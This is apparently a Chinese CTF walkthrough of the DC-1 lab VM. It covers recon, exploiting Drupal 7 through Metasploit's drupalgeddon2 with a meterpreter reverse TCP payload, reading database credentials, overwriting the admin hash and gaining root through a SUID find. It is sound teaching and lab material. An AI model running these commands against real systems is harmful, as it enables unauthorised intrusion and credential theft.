赞
踩
作者: susususuao
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
环境:
虚拟机 :VMware Workstation Pro 16
网络模式 :VMnet8(能够相互通信即可)
DC-1 :IP地址:192.168.5.142
KALI :IP地址:192.168.5.133
下载:
VMware Workstation pro 16 点击下载
KALI 点击下载
DC-1 点击下载
(至2022/7.5)
部署DC-1:
1.导入虚拟机
2.配置网络确保能够通信
# arp-scan -l //发送ARP包到任意多个目标主机,寻找局域网存活的主机
# nmap -sV -A -p- 192.168.5.142 //检测服务器开启的端口和版本号
-sV 版本检测 用于扫描目标主机服务版本号. 探测打开的端口以确定服务/版本信息
-A ip 综合扫描
# whatweb -v 192.168.5.142 //指纹识别
可以看到CMS为Drupal 7 (http://drupal.org)。
接下来就好办了,就以Drupal进行渗透。
# msfconsole //进入
search Drupa //查找相关Drupa漏洞模块
2. 经过测试发现exploit/unix/webapp/drupal_drupalgeddon2模块可以利用
use exploit/unix/webapp/drupal_drupalgeddon2 //进入该模块
show payloads //查看有哪些payloads
3. 这里使用payload/php/meterpreter/reverse_tcp
set payload php/meterpreter/reverse_tcp //使用该payload
show options //查看需要的配置
4. yes是必填项,可以发现默认基本上给填好了,只需把RHOST(靶机IP)
set rhosts 192.168.5.142 //设置靶机IP地址
run //运行
可以看到session的成功建立,接下来就开始flag的寻找。
1. 首先拿到shell,在使用python进行反弹
shell //获得shell
id //测试下
python -c "import pty;pty.spawn('/bin/bash')" //通过python进行反弹
flag1
ls
cat flag1.txt
提示:每个好的CMS都需要一个配置文件——你也是。
flag2
find . -name "sett*" //通过find搜索名字sett开头的相关文件
cat ./sites/default/settings.php
flag2给出的提示:
暴力和字典攻击不是
只有获得访问权限的方法(您将需要访问权限)。
你能用这些证书做什么?
同时还发现了mysql数据库账号密码
flag3
mysql -udbuser -pR0ck3t
show databases; //查看数据库
use drupaldb; //进入drupaldb库
show tables; //查看里面的表
select * from users\G; //查看users表里内容
\G 将查到的结构旋转90度变成纵向
find . -name "*hash*" //搜索有hash有相关的
./scripts/password-hash.sh 123456
update users set pass='$S$DpEkg8l1hOozcQUqw1rK.qpZ..CrV8b0jWOrfzoIA3z9Tmn/rDry' where name="admin";
flag4
cat /etc/passwd //查看
cd /home/flag
ls
cat flag4.txt
flag5
cd ../../ //返回根目录
cd /root //进入root目录
find / -perm -u=s -type f 2>/dev/null //查看执行的有哪些程序
find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)
find ./ aaa -exec '/bin/sh' \;
cd /root
ls
cat thefinalflag.txt
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。